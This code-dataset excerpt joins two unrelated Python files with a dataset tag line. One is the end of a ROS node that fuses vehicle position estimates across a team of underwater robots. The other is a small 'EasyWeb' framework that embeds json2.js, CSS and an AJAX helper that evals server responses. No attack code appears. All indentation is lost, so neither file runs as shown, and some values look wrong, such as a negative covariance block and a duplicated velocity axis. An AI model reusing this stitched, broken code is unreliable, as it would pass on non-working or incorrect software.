y = Measurement("gps_y", t_now, self.my_name,"", self.data_y, 0.1, [])
self.filter.add_meas(y)
self.data_y = None
# correction
self.filter.correct(t_now)
### Covariancee Intersect ###
# Turn odom estimate into numpy
mean = np.array([[pv_msg.position.x, pv_msg.position.y, pv_msg.position.z, \
pv_msg.velocity.x, pv_msg.velocity.y, pv_msg.velocity.z]]).T
cov = np.array(pv_msg.covariance).reshape(6,6)
# Run covariance intersection
c_bar, Pcc = self.filter.intersect(mean, cov)
position = Vector3(c_bar[0,0], c_bar[1,0], c_bar[2,0])
velocity = Vector3(c_bar[3,0], c_bar[4,0], c_bar[5,0])
covariance = list(Pcc.flatten())
new_pv_msg = PositionVelocity(position, velocity, covariance)
self.intersection_pub.publish(new_pv_msg)
self.publish_estimates(t_now)
self.last_update_time = t_now
self.update_seq += 1
self.update_lock.release()
self.publish_stats(t_now)
def control_status_callback(self, msg):
self.update_lock.acquire()
if msg.is_setpoint_active and msg.is_heading_velocity_setpoint_active:
self.control_input = np.array([[msg.setpoint_velocity.y, msg.setpoint_velocity.z, -msg.setpoint_velocity.z]]).T
else:
self.control_input = None
# GRAB CONTROL INPUT
self.update_lock.release()
def depth_callback(self, msg):
self.meas_lock.acquire()
self.last_depth_meas = msg.data
self.meas_lock.release()
def publish_estimates(self, timestamp):
ne = NetworkEstimate()
for asset in self.asset2id.keys():
if "surface" in asset:
continue
if "red" in asset and not self.red_asset_found:
continue
# else:
# print("publishing " + asset + "'s estimate")
# Construct Odometry Msg for Asset
mean, cov = self.filter.get_asset_estimate(asset)
pose_cov = np.zeros((6,6))
pose_cov[:3,:3] = cov[:3,:3]
if asset == self.my_name:
pose = Pose(Point(mean[0],mean[1],mean[2]), \
self.last_orientation)
pose_cov[3:,3:] = self.last_orientation_cov[3:,3:]
else:
pose = Pose(Point(mean[0],mean[1],mean[2]), \
Quaternion(0,0,0,1))
pose_cov[3:,3:] = np.eye(3) * 3
pwc = PoseWithCovariance(pose, list(pose_cov.flatten()))
twist_cov = np.zeros((6,6))
twist_cov[:3,:3] = cov[3:6,3:6]
if asset == self.my_name:
tw = Twist(Vector3(mean[3],mean[4],mean[5]), self.last_orientation_dot)
twist_cov[3:, 3:] = self.last_orientation_dot_cov[3:,3:]
else:
tw = Twist(Vector3(mean[3],mean[4],mean[5]), Vector3(0,0,0))
twist_cov[3:, 3:] = np.eye(3) * -1
twc = TwistWithCovariance(tw, list(twist_cov.flatten()))
h = Header(self.update_seq, timestamp, "map")
o = Odometry(h, "map", pwc, twc)
ae = AssetEstimate(o, asset)
ne.assets.append(ae)
self.asset_pub_dict[asset].publish(o)
self.network_pub.publish(ne)
def meas_pkg_callback(self, msg):
# Modem Meas taken by surface
if msg.src_asset == "surface":
self.cuprint("Receiving Surface Modem Measurements")
for meas in msg.measurements:
                # Fuse approximately on the next update, so we can get the other asset's position immediately
if meas.meas_type == "modem_elevation":
rospy.logerr("Ignoring Modem Elevation Measurement since we have depth measurements")
continue
elif meas.meas_type == "modem_azimuth":
meas.global_pose = list(meas.global_pose)
# self.cuprint("azimuth: " + str(meas.data))
meas.data = (meas.data * np.pi) / 180
meas.variance = self.default_meas_variance["modem_azimuth"]
elif meas.meas_type == "modem_range":
meas.global_pose = list(meas.global_pose)
# self.cuprint("range: " + str(meas.data))
meas.variance = self.default_meas_variance["modem_range"]
self.filter.add_meas(meas, force_fuse=True)
# Modem Meas taken by me
elif msg.src_asset == self.my_name:
# self.cuprint("Receiving Modem Measurements Taken by Me")
for meas in msg.measurements:
                # Fuse approximately on the next update, so we can get the other asset's position immediately
if meas.meas_type == "modem_elevation":
rospy.logerr("Ignoring Modem Elevation Measurement since we have depth measurements")
continue
elif meas.meas_type == "modem_azimuth":
meas.global_pose = list(meas.global_pose)
meas.data = (meas.data * np.pi) / 180
meas.variance = self.default_meas_variance["modem_azimuth"]
elif meas.meas_type == "modem_range":
meas.global_pose = list(meas.global_pose)
meas.variance = self.default_meas_variance["modem_range"]
self.filter.add_meas(meas, force_fuse=True)
# Buffer
else:
self.cuprint("receiving buffer")
self.update_lock.acquire()
# Loop through buffer and see if we've found the red agent
for m in msg.measurements:
if m.measured_asset in self.red_asset_names and not self.red_asset_found:
self.red_asset_found = True
self.cuprint("Red asset measurement received!")
implicit_cnt, explicit_cnt = self.filter.catch_up(msg.delta_multiplier, msg.measurements)
self.cuprint("...caught up")
self.update_lock.release()
self.statistics.implicit_count += implicit_cnt
self.statistics.explicit_count += explicit_cnt
def get_meas_pkg_callback(self, req):
self.cuprint("pulling buffer")
delta, buffer = self.filter.pull_buffer()
ind = self.statistics.delta_tiers.index(delta)
self.statistics.buffer_counts[ind] += 1
mp = MeasurementPackage(buffer, self.my_name, delta)
print(mp)
return mp
################################
### Initialization Functions ###
################################
def get_indices_from_asset_names(blue_team):
my_name = rospy.get_param("~my_name")
red_team = rospy.get_param("~red_team_names")
asset2id = {}
asset2id[my_name] = 0
next_index = 1
for asset in blue_team:
if asset == my_name:
continue
else:
asset2id[asset] = next_index
next_index += 1
for asset in red_team:
asset2id[asset] = next_index
next_index += 1
if my_name != "surface":
asset2id["surface"] = -1 # arbitrary negative number
return asset2id
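# Illustrative example (hypothetical names): with my_name = "rov_a",
# blue_team = ["rov_a", "rov_b"] and red_team_names = ["red_1"], this returns
# {"rov_a": 0, "rov_b": 1, "red_1": 2, "surface": -1}.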
def get_delta_codebook_table():
delta_codebook = {}
meas_info = rospy.get_param("~measurements")
for meas in meas_info.keys():
base_et_delta = meas_info[meas]["base_et_delta"]
delta_codebook[meas] = base_et_delta
return delta_codebook
def get_missed_meas_tolerance_table():
meas_tolerance_table = {}
meas_info = rospy.get_param("~measurements")
for meas in meas_info.keys():
meas_tolerance_table[meas] = meas_info[meas]["missed_tolerance"]
return meas_tolerance_table
def get_meas_space_table():
meas_space_table = {}
meas_info = rospy.get_param("~measurements")
for meas in meas_info.keys():
meas_space_table[meas] = meas_info[meas]["buffer_size"]
meas_space_table["bookstart"] = rospy.get_param("~buffer_space/bookstart")
meas_space_table["bookend"] = rospy.get_param("~buffer_space/bookend")
meas_space_table["final_time"] = rospy.get_param("~buffer_space/final_time")
return meas_space_table
def _dict2arr(d):
return np.array([[d["x"]],\
[d["y"]],\
[d["z"]],\
[d["x_vel"]], \
[d["y_vel"]],\
[d["z_vel"]]])
def _list2arr(l):
return np.array([l]).reshape(-1,1)
def _add_velocity_states(base_states):
velocities = np.zeros((base_states.size,1))
return np.concatenate((base_states, velocities), axis=0)
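# Layout note (sketch): each asset contributes NUM_OWNSHIP_STATES = 6 states
# ordered [x, y, z, x_vel, y_vel, z_vel]; _add_velocity_states appends an equal
# number of zeroed velocity states to a position-only column vector (e.g. a
# 3x1 [x, y, z] becomes the 6x1 [x, y, z, 0, 0, 0]).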
def get_initial_estimate(num_states, blue_team_names, blue_team_positions):
default_starting_position = _dict2arr(rospy.get_param("~default_starting_position"))
uncertainty_known_starting_position = _dict2arr( rospy.get_param("~initial_uncertainty/known_starting_position"))
uncertainty_unknown_starting_position = _dict2arr( rospy.get_param("~initial_uncertainty/unknown_starting_position"))
my_starting_position = rospy.get_param("~starting_position")
if not my_starting_position:
my_starting_position = deepcopy(default_starting_position)
else:
my_starting_position = _add_velocity_states( _list2arr(my_starting_position))
ownship_uncertainty = _dict2arr( rospy.get_param("~initial_uncertainty/ownship") )
uncertainty = np.zeros((num_states,num_states))
uncertainty_vector = np.zeros((num_states,1))
uncertainty_vector[:NUM_OWNSHIP_STATES] = ownship_uncertainty
uncertainty += np.eye(num_states) * uncertainty_vector
state_vector = my_starting_position
my_name = rospy.get_param("~my_name")
red_team_names = rospy.get_param("~red_team_names")
next_index_unc = 1
next_index_pos = 1
for asset in blue_team_names:
if asset == my_name:
next_index_pos += 1
continue
        if len(blue_team_positions) >= next_index_pos: # we were given the position of this asset in roslaunch
next_position = _add_velocity_states( _list2arr( blue_team_positions[next_index_pos-1]))
uncertainty_vector = np.zeros((num_states,1))
uncertainty_vector[next_index_unc*NUM_OWNSHIP_STATES:(next_index_unc+1)*NUM_OWNSHIP_STATES] = uncertainty_known_starting_position
uncertainty += np.eye(num_states) * uncertainty_vector
else:
next_position = deepcopy(default_starting_position)
uncertainty_vector = np.zeros((num_states,1))
uncertainty_vector[next_index_unc*NUM_OWNSHIP_STATES:(next_index_unc+1)*NUM_OWNSHIP_STATES] = uncertainty_unknown_starting_position
uncertainty += np.eye(num_states) * uncertainty_vector
state_vector = np.concatenate((state_vector, next_position),axis=0)
next_index_unc += 1
next_index_pos += 1
for asset in red_team_names:
next_position = deepcopy(default_starting_position)
state_vector = np.concatenate((state_vector, next_position),axis=0)
uncertainty_vector = np.zeros((num_states,1))
uncertainty_vector[next_index_unc*NUM_OWNSHIP_STATES:(next_index_unc+1)*NUM_OWNSHIP_STATES] = uncertainty_unknown_starting_position
uncertainty += np.eye(num_states) * uncertainty_vector
next_index_unc += 1
return state_vector, uncertainty
def get_process_noise(num_states, blue_team_names):
Q = np.zeros((num_states, num_states))
ownship_Q = _dict2arr(rospy.get_param("~process_noise/ownship"))
blueteam_Q = _dict2arr(rospy.get_param("~process_noise/blueteam"))
redteam_Q = _dict2arr(rospy.get_param("~process_noise/redteam"))
Q_vec = np.zeros((num_states,1))
Q_vec[:NUM_OWNSHIP_STATES] = ownship_Q
Q += np.eye(num_states) * Q_vec
my_name = rospy.get_param("~my_name")
red_team_names = rospy.get_param("~red_team_names")
next_index = 1
for asset in blue_team_names:
if asset == my_name:
continue
Q_vec = np.zeros((num_states,1))
Q_vec[next_index*NUM_OWNSHIP_STATES:(next_index+1)*NUM_OWNSHIP_STATES] = blueteam_Q
Q += np.eye(num_states) * Q_vec
next_index += 1
for asset in red_team_names:
Q_vec = np.zeros((num_states,1))
Q_vec[next_index*NUM_OWNSHIP_STATES:(next_index+1)*NUM_OWNSHIP_STATES] = redteam_Q
Q += np.eye(num_states) * Q_vec
next_index += 1
return Q
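# Note on the resulting shape (sketch, not part of the original file): Q ends
# up block diagonal with one 6x6 diagonal block per asset -- ownship_Q first,
# then blueteam_Q for each other blue asset, then redteam_Q for each red asset.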
def get_default_meas_variance():
meas_vars = {}
meas_info = rospy.get_param("~measurements")
for meas in meas_info.keys():
sd = meas_info[meas]["default_sd"]
meas_vars[meas] = sd ** 2
return meas_vars
if __name__ == "__main__":
rospy.init_node("etddf_node")
my_name = rospy.get_param("~my_name")
update_rate = rospy.get_param("~update_rate")
delta_tiers = rospy.get_param("~delta_tiers")
blue_team_names = rospy.get_param("~blue_team_names")
blue_team_positions = rospy.get_param("~blue_team_positions")
# Don't track surface if it isn't this agent
if my_name != "surface":
ind = blue_team_names.index("surface")
if ind >= 0:
blue_team_names.pop(ind)
blue_team_positions.pop(ind)
asset2id = get_indices_from_asset_names(blue_team_names)
delta_codebook_table = get_delta_codebook_table()
buffer_size = rospy.get_param("~buffer_space/capacity")
meas_space_table = get_meas_space_table()
missed_meas_tolerance_table = get_missed_meas_tolerance_table()
if my_name != "surface":
num_assets = len(asset2id) - 1 # subtract surface
else:
num_assets = len(asset2id)
x0, P0 = get_initial_estimate(num_assets * NUM_OWNSHIP_STATES, blue_team_names, blue_team_positions)
Q = get_process_noise(num_assets * NUM_OWNSHIP_STATES, blue_team_names)
rospy.logwarn("{}, {}, {}, {}".format(my_name, x0.shape, P0.shape, Q.shape))
default_meas_variance = get_default_meas_variance()
use_control_input = rospy.get_param("~use_control_input")
et_node = ETDDF_Node(my_name,
update_rate, \
delta_tiers, \
asset2id, \
delta_codebook_table, \
buffer_size, \
meas_space_table, \
missed_meas_tolerance_table, \
x0,\
P0,\
Q,\
default_meas_variance,\
use_control_input)
rospy.spin() | StarcoderdataPython |
1704397 | # -*- coding: utf-8 -*-
from string import Template
showfun = '''
<li class= "optitem" width="100%%">
<div style="float: left; width: 20px"> </div>
<a onclick="server.spring()" python="%s" href="#" width="100%%">%s</a>
</li>
'''
#hr = '''<HR>'''
jsonlib = r'''
if (!this.JSON) {
this.JSON = {};
}
(function () {
"use strict";
function f(n) {
// Format integers to have at least two digits.
return n < 10 ? '0' + n : n;
}
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf()) ?
this.getUTCFullYear() + '-' +
f(this.getUTCMonth() + 1) + '-' +
f(this.getUTCDate()) + 'T' +
f(this.getUTCHours()) + ':' +
f(this.getUTCMinutes()) + ':' +
f(this.getUTCSeconds()) + 'Z' : null;
};
String.prototype.toJSON =
Number.prototype.toJSON =
Boolean.prototype.toJSON = function (key) {
return this.valueOf();
};
}
var cx = /[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
escapable = /[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
gap,
indent,
meta = { // table of character substitutions
'\b': '\\b',
'\t': '\\t',
'\n': '\\n',
'\f': '\\f',
'\r': '\\r',
'"' : '\\"',
'\\': '\\\\'
},
rep;
function quote(string) {
// If the string contains no control characters, no quote characters, and no
// backslash characters, then we can safely slap some quotes around it.
// Otherwise we must also replace the offending characters with safe escape
// sequences.
escapable.lastIndex = 0;
return escapable.test(string) ?
'"' + string.replace(escapable, function (a) {
var c = meta[a];
return typeof c === 'string' ? c :
'\\u' + ('0000' + a.charCodeAt(0).toString(16)).slice(-4);
}) + '"' :
'"' + string + '"';
}
function str(key, holder) {
// Produce a string from holder[key].
var i, // The loop counter.
k, // The member key.
v, // The member value.
length,
mind = gap,
partial,
value = holder[key];
// If the value has a toJSON method, call it to obtain a replacement value.
if (value && typeof value === 'object' &&
typeof value.toJSON === 'function') {
value = value.toJSON(key);
}
// If we were called with a replacer function, then call the replacer to
// obtain a replacement value.
if (typeof rep === 'function') {
value = rep.call(holder, key, value);
}
// What happens next depends on the value's type.
switch (typeof value) {
case 'string':
return quote(value);
case 'number':
// JSON numbers must be finite. Encode non-finite numbers as null.
return isFinite(value) ? String(value) : 'null';
case 'boolean':
case 'null':
// If the value is a boolean or null, convert it to a string. Note:
// typeof null does not produce 'null'. The case is included here in
// the remote chance that this gets fixed someday.
return String(value);
// If the type is 'object', we might be dealing with an object or an array or
// null.
case 'object':
// Due to a specification blunder in ECMAScript, typeof null is 'object',
// so watch out for that case.
if (!value) {
return 'null';
}
// Make an array to hold the partial results of stringifying this object value.
gap += indent;
partial = [];
// Is the value an array?
if (Object.prototype.toString.apply(value) === '[object Array]') {
// The value is an array. Stringify every element. Use null as a placeholder
// for non-JSON values.
length = value.length;
for (i = 0; i < length; i += 1) {
partial[i] = str(i, value) || 'null';
}
// Join all of the elements together, separated with commas, and wrap them in
// brackets.
v = partial.length === 0 ? '[]' :
gap ? '[\n' + gap +
partial.join(',\n' + gap) + '\n' +
mind + ']' :
'[' + partial.join(',') + ']';
gap = mind;
return v;
}
// If the replacer is an array, use it to select the members to be stringified.
if (rep && typeof rep === 'object') {
length = rep.length;
for (i = 0; i < length; i += 1) {
k = rep[i];
if (typeof k === 'string') {
v = str(k, value);
if (v) {
partial.push(quote(k) + (gap ? ': ' : ':') + v);
}
}
}
} else {
// Otherwise, iterate through all of the keys in the object.
for (k in value) {
if (Object.hasOwnProperty.call(value, k)) {
v = str(k, value);
if (v) {
partial.push(quote(k) + (gap ? ': ' : ':') + v);
}
}
}
}
// Join all of the member texts together, separated with commas,
// and wrap them in braces.
v = partial.length === 0 ? '{}' :
gap ? '{\n' + gap + partial.join(',\n' + gap) + '\n' +
mind + '}' : '{' + partial.join(',') + '}';
gap = mind;
return v;
}
}
// If the JSON object does not yet have a stringify method, give it one.
if (typeof JSON.stringify !== 'function') {
JSON.stringify = function (value, replacer, space) {
// The stringify method takes a value and an optional replacer, and an optional
// space parameter, and returns a JSON text. The replacer can be a function
// that can replace values, or an array of strings that will select the keys.
// A default replacer method can be provided. Use of the space parameter can
// produce text that is more easily readable.
var i;
gap = '';
indent = '';
// If the space parameter is a number, make an indent string containing that
// many spaces.
if (typeof space === 'number') {
for (i = 0; i < space; i += 1) {
indent += ' ';
}
// If the space parameter is a string, it will be used as the indent string.
} else if (typeof space === 'string') {
indent = space;
}
// If there is a replacer, it must be a function or an array.
// Otherwise, throw an error.
rep = replacer;
if (replacer && typeof replacer !== 'function' &&
(typeof replacer !== 'object' ||
typeof replacer.length !== 'number')) {
throw new Error('JSON.stringify');
}
// Make a fake root object containing our value under the key of ''.
// Return the result of stringifying the value.
return str('', {'': value});
};
}
// If the JSON object does not yet have a parse method, give it one.
if (typeof JSON.parse !== 'function') {
JSON.parse = function (text, reviver) {
// The parse method takes a text and an optional reviver function, and returns
// a JavaScript value if the text is a valid JSON text.
var j;
function walk(holder, key) {
// The walk method is used to recursively walk the resulting structure so
// that modifications can be made.
var k, v, value = holder[key];
if (value && typeof value === 'object') {
for (k in value) {
if (Object.hasOwnProperty.call(value, k)) {
v = walk(value, k);
if (v !== undefined) {
value[k] = v;
} else {
delete value[k];
}
}
}
}
return reviver.call(holder, key, value);
}
// Parsing happens in four stages. In the first stage, we replace certain
// Unicode characters with escape sequences. JavaScript handles many characters
// incorrectly, either silently deleting them, or treating them as line endings.
text = String(text);
cx.lastIndex = 0;
if (cx.test(text)) {
text = text.replace(cx, function (a) {
return '\\u' +
('0000' + a.charCodeAt(0).toString(16)).slice(-4);
});
}
// In the second stage, we run the text against regular expressions that look
// for non-JSON patterns. We are especially concerned with '()' and 'new'
// because they can cause invocation, and '=' because it can cause mutation.
// But just to be safe, we want to reject all unexpected forms.
// We split the second stage into 4 regexp operations in order to work around
// crippling inefficiencies in IE's and Safari's regexp engines. First we
// replace the JSON backslash pairs with '@' (a non-JSON character). Second, we
// replace all simple value tokens with ']' characters. Third, we delete all
// open brackets that follow a colon or comma or that begin the text. Finally,
// we look to see that the remaining characters are only whitespace or ']' or
// ',' or ':' or '{' or '}'. If that is so, then the text is safe for eval.
if (/^[\],:{}\s]*$/
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, ']')
.replace(/(?:^|:|,)(?:\s*\[)+/g, ''))) {
// In the third stage we use the eval function to compile the text into a
// JavaScript structure. The '{' operator is subject to a syntactic ambiguity
// in JavaScript: it can begin a block or an object literal. We wrap the text
// in parens to eliminate the ambiguity.
j = eval('(' + text + ')');
// In the optional fourth stage, we recursively walk the new structure, passing
// each name/value pair to a reviver function for possible transformation.
return typeof reviver === 'function' ?
walk({'': j}, '') : j;
}
// If the text is not JSON parseable, then a SyntaxError is thrown.
throw new SyntaxError('JSON.parse');
};
}
}());
'''
maincss = r'''
body {
font: 90% Arial, Verdana, Helvetica, sans-serif;
height: 100%;
background: #FFFFFF;
margin: 0;
padding: 0;
text-align: center;
color: #000000;
}
.twoColHybLt #toptip {
position:absolute;
z-index:100;
}
.twoColHybLt #main_toolbar {
width: auto;
text-align: right;
margin: 0;
border-bottom: 1px solid #C2CFF1;
overflow:auto;
height: 20px;
}
.twoColHybLt #main_title h3 {
margin: 0;
}
.twoColHybLt #main_title {
font: 120% Arial;
width: auto;
text-align: left;
margin: 0;
overflow:auto;
height: 40px;
}
.twoColHybLt #container {
width: auto;
border: 0px none #000000;
text-align: left;
margin-top: 0;
margin-right: 0px;
margin-bottom: 0;
margin-left: 0px;
overflow:auto;
}
.twoColHybLt #sidebar {
float: left;
width: 18em;
padding-right: 0;
padding-left: 0;
overflow: auto;
}
.twoColHybLt #splitbar {
float: left;
width: 8px;
background: #EBEFF9;
padding-right: 0;
padding-left: 0;
overflow: auto;
border-left: 1px solid #C2CFF1;
}
.twoColHybLt #splitbar:hover {
background: #C2CFF1;
}
.twoColHybLt #sidebar h3,
.twoColHybLt #sidebar p {
margin-left: 10px;
margin-right: 10px;
}
.twoColHybLt #mainContent {
margin: 0 0 0 13em;
}
#mainContent #tabcontent {
overflow: auto;
}
.twoColHybLt #topbar {
font: 170% arial;
width: auto;
height: 30px;
background: #C2CFF1;
overflow: auto;
padding: 5px 15px 0 10px;
}
#topnav {
float: left;
}
#topmenu {
float: right;
}
#toptitle {
width: auto;
}
#switch_argbar {
font: 50% arial;
color: #0000CC;
float: right;
position: relative;
top: 5px;
}
.twoColHybLt #argbar {
font: 120% arial;
width: auto;
height: auto !important; height: 30px; min-height: 30px;
text-align: left;
background: #EBEFF9;
border-bottom: 1px solid #C2CFF1;
overflow: auto;
padding: 0 10px 0 10px;
}
#argbar dl .first {
border-top: 0;
}
#argbar dl {
padding: 0px 10px 0px 10px;
border-top: 1px dashed #C2CFF1;
overflow: hidden;
margin: 0;
}
#argbar dt {
float: left;
width: 60px;
font-weight: bold;
text-align: right;
padding: 2px 0 0 0;
}
#argbar dd {
overflow: auto;
width: auto;
padding: 0 0 0 20px;
}
#argbar dd div {
font: 60% arial;
float: left;
width: 100px;
height: 20px;
border: 3px solid #B6CDDC;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
margin: 0 10px 1px 0;
}
#argbar dd div:hover {
background: white;
}
#argbar dd select {
min-width: 220px;
height: 26px;
border: 3px solid #B6CDDC;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
background: #EBEFF9;
}
#argbar dd select:hover {
background: white;
}
#argbar dd input[type=text] {
min-width: 220px;
height: 20px;
border: 3px solid #B6CDDC;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
background: #EBEFF9;
}
#argbar dd input[type=text]:hover {
background: white;
}
.twoColHybLt #contentzone {
overflow: scroll;
}
.opts {
padding: 5px 0px 5px 0px;
margin: 0;
border-top: 1px solid #C2CFF1;
}
.opts span {
padding-left: 5px;
margin-bottom: 25px;
font-weight: bold;
}
.optitem {
list-style-type:none;
padding-right: 0;
padding-left: 0;
}
.optitem:hover{
background: #FFFFAA;
}
.optitem a {
text-decoration: none;
color: #3f3f3f;
}
.fltrt {
float: right;
margin-left: 8px;
}
.fltlft {
float: left;
margin-right: 8px;
}
.clearfloat {
clear:both;
height: 100%;
font-size: 1px;
line-height: 0px;
}
html {
height:100%;
}
'''
maincss = maincss + '''
.ep-table {
padding: 0;
margin: 0;
}
caption {
padding: 0 0 5px 0;
width: 700px;
font: italic 11px "Trebuchet MS", Verdana, Arial, Helvetica, sans-serif;
text-align: right;
}
th {
font: bold 11px "Trebuchet MS", Verdana, Arial, Helvetica, sans-serif;
color: #4f6b72;
border-right: 1px solid #C1DAD7;
border-bottom: 1px solid #C1DAD7;
border-top: 1px solid #C1DAD7;
letter-spacing: 2px;
text-align: left;
padding: 6px 6px 6px 12px;
background: #CAE8EA;
width: 30px;
}
th.nobg {
border-top: 0;
border-left: 0;
border-right: 1px solid #C1DAD7;
background: none;
}
td {
border-right: 1px solid #C1DAD7;
border-bottom: 1px solid #C1DAD7;
background: #fff;
padding: 6px 6px 6px 12px;
color: #4f6b72;
}
td.alt {
background: #F5FAFA;
color: #797268;
}
th.spec {
border-left: 1px solid #C1DAD7;
border-top: 0;
background: #fff;
font: bold 10px "Trebuchet MS", Verdana, Arial, Helvetica, sans-serif;
}
th.specalt {
border-left: 1px solid #C1DAD7;
border-top: 0;
background: #f5fafa url(images/bullet2.gif) no-repeat;
font: bold 10px "Trebuchet MS", Verdana, Arial, Helvetica, sans-serif;
color: #797268;
}
.ep-bar {
height: 100%;
_position: relative;
margin: 0 auto;
padding: 1px 1px 1px 1px;
}
.ep-bar-in {
height: 100%;
background-color: #B1D632;
position: relative;
display: table;
}
.ep-bar-iin{
_position: absolute;
_top: 50%;
vertical-align: middle;
display: table-cell;
}
.ep-bar-iiin {
_position: relative;
width: 100%;
height: 100%;
_top: -50%;
}
.ep-number {
white-space: nowrap;
}
'''
ajaxlib = r'''
function Server() {
this.url = document.URL;
try {
this.conn = new XMLHttpRequest();
} catch(exp) {
this.conn = new ActiveXObject("MSXML2.XMLHTTP.3.0");
};
this.resizecontainzone = function()
{
function $(id){
return window.document.getElementById(id);
}
var h = document.getElementById( "mainContent" ).offsetHeight;
h = h - document.getElementById( "topbar" ).offsetHeight;
h = h - document.getElementById( "argbar" ).offsetHeight;
$("contentzone").style.height = h + "px";
};
this.conn.onreadystatechange = function()
{
if( this.readyState == 4 )
{
if ( this.status == "200" )
{
eval( this.responseText ) ;
function $(id){
return window.document.getElementById(id);
}
var h = document.getElementById( "mainContent" ).offsetHeight;
h = h - document.getElementById( "topbar" ).offsetHeight;
h = h - document.getElementById( "argbar" ).offsetHeight;
$("contentzone").style.height = h + "px";
tip = document.getElementById("toptip") ;
tip.style.display = "none" ;
}
else
{
tip = document.getElementById("toptip") ;
tip.style.display = "none" ;
tip.innerHTML = "error catched : " + this.status ;
tip.style.display = "" ;
}
}
};
this.ajaxcall = function( content, info ) {
ajaxurl = this.url;
if ( info != null )
{
tip = document.getElementById("toptip") ;
tip.style.display = "none" ;
tip.innerHTML = info ;
tip.style.display = "" ;
}
content = JSON.stringify(content);
this.conn.open( "POST" , ajaxurl , true );
this.conn.setRequestHeader("Content-Length", content.length);
this.conn.send( content );
};
this.onload = function() {
var content = { id:null, event:"onload", python:"",
uri:document.URL };
this.ajaxcall( content, "loading page..." );
};
this.spring = function() {
var ev = window.event || arguments.callee.caller.arguments[0];
var target = ev.srcElement || ev.target;
var python = target.getAttribute("python");
if( python == null ) {
python = "";
}
var content = { id:target.id, event:ev.type, python:python,
uri:document.URL };
this.ajaxcall( content, "loading page..." );
};
this.ontimer = function() {
var d = document.getElementById( this.id );
if ( d === undefined || d == null ) {
this.removetimer();
return;
}
var content = { id:this.id, event:"timer", python:this.info,
uri:document.URL };
this.ajaxcall( content, null );
};
this.settimer = function(info, id) {
this.info = info;
this.id = id;
var _this = this;
this.timer = setInterval(function(){_this.ontimer();}, 2000 );
};
this.removetimer = function() {
clearInterval(this.timer);
};
};
var server = new Server();
'''
jsothers = r'''
window.onload = function(){
resize();
server.onload();
};
window.onresize = resize;
function $(id){
return window.document.getElementById(id);
}
function resize(){
var doc = window.document;
var h = Math.max(doc.body.offsetHeight, doc.documentElement.offsetHeight);
h = h - document.getElementById( "main_toolbar" ).offsetHeight;
h = h - document.getElementById( "main_title" ).offsetHeight;
$("container").style.height = h + "px";
$("sidebar").style.height = h + "px";
$("splitbar").style.height = h + "px";
$("mainContent").style.height = h + "px";
server.resizecontainzone()
doc = null;
}
function hidesidebar() {
if (this.visibale)
{
$("sidebar").style.display = "none";
//$("mainContent").style.width = "100%";
$("topnav").style.display = "block";
this.visibale = 0;
//resize();
}
else
{
//$("mainContent").style.width = "auto";
$("sidebar").style.display = "block";
$("topnav").style.display = "none";
this.visibale = 1;
//resize();
}
}
hidesidebar.visibale = 1;
function hideargbar() {
if (this.visibale)
{
$("argbar").style.display = "none";
$("switch_argbar").innerHTML = "显示参数栏";
this.visibale = 0;
resize();
}
else
{
$("argbar").style.display = "block";
$("switch_argbar").innerHTML = "隐藏参数栏";
this.visibale = 1;
resize();
}
}
hideargbar.visibale = 1;
'''
mainhtml = r'''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Monitor</title>
<style type="text/css">
$maincss
</style>
<!--[if IE]>
<style type="text/css">
.twoColHybLt #sidebar { padding-top: 30px; }
.twoColHybLt #mainContent { zoom: 1; padding-top: 15px; }
</style>
<![endif]-->
<script type="text/javascript">
$ajaxlib
</script>
<script type="text/javascript">
$jsothers
</script>
</head>
<body class="twoColHybLt">
<div id="toptip" style="display:none;">A</div>
<div id="main_toolbar">
Login
</div>
<div id="main_title">
<h3>$title</h3>
</div>
<div id="container">
<div id="sidebar">
$funclist
</div>
<div id="splitbar" onclick="hidesidebar()"></div>
<div id="mainContent">
<div id="topbar" >
<div id="topnav" style="display:none;" >
<input type="button" value="导航" />
</div>
<div id="topmenu">
<input type="button" value="提交/刷新" />
</div>
<div id="switch_argbar" onclick="hideargbar()">隐藏参数栏</div>
<div id="toptitle"></div>
</div>
<div id="argbar" ></div>
<div id="contentzone" ></div>
</div>
</div>
</body>
</html>
'''
mainhtml = Template(mainhtml)
from Al import easydoc
from Al.__furture__ import easyprint as eprint
import json
from pprint import pprint
from urlparse import urlparse
import xml.sax.saxutils
class EasyWeb( object ):
def __init__( self, title = None ):
self.title = title or "EasyWeb"
self.methods = dict( ( k[4:], getattr( self, k ) ) for k in dir(self)
if k.startswith('web_') )
self.respmakers = dict( ( k[5:], getattr( self, k ) ) for k in dir(self)
if k.startswith('resp_') )
self.methods[''] = self._web_default
self.methods[None] = self.main_page
self.methods_meta = dict( ( k, easydoc.parse( v.__doc__, 'object_ex' ) )
for k, v in self.methods.items() )
#pprint( self.methods_meta )
self.mp = self.make_mainpage()
def make_mainpage( self ):
'''
'''
funclist = [ ( k, v.get( 'name', k), v.get('group', '') )
for k, v in self.methods_meta.items() if k ]
grps = set( g for f, n, g in funclist )
funclist = [ '\n'.join(
[ showfun % (f, n) for f, n, _g in funclist if _g == g ]
) for g in grps ]
grps = [ ( ( '<span>' + g + '</span>\n' ) if g else '' )
for g in grps ]
funclist = [ '<ul class="opts">' + g + fl + '</ul>'
for g , fl in zip( grps, funclist ) ]
funclist = '\n'.join(funclist)
#return mainhtml % ( 'Monitor', funlist )
return mainhtml.safe_substitute( title = self.title,
funclist = funclist,
jsothers = jsothers,
ajaxlib = ajaxlib,
maincss = maincss,
)
def run( self, env, start_response ):
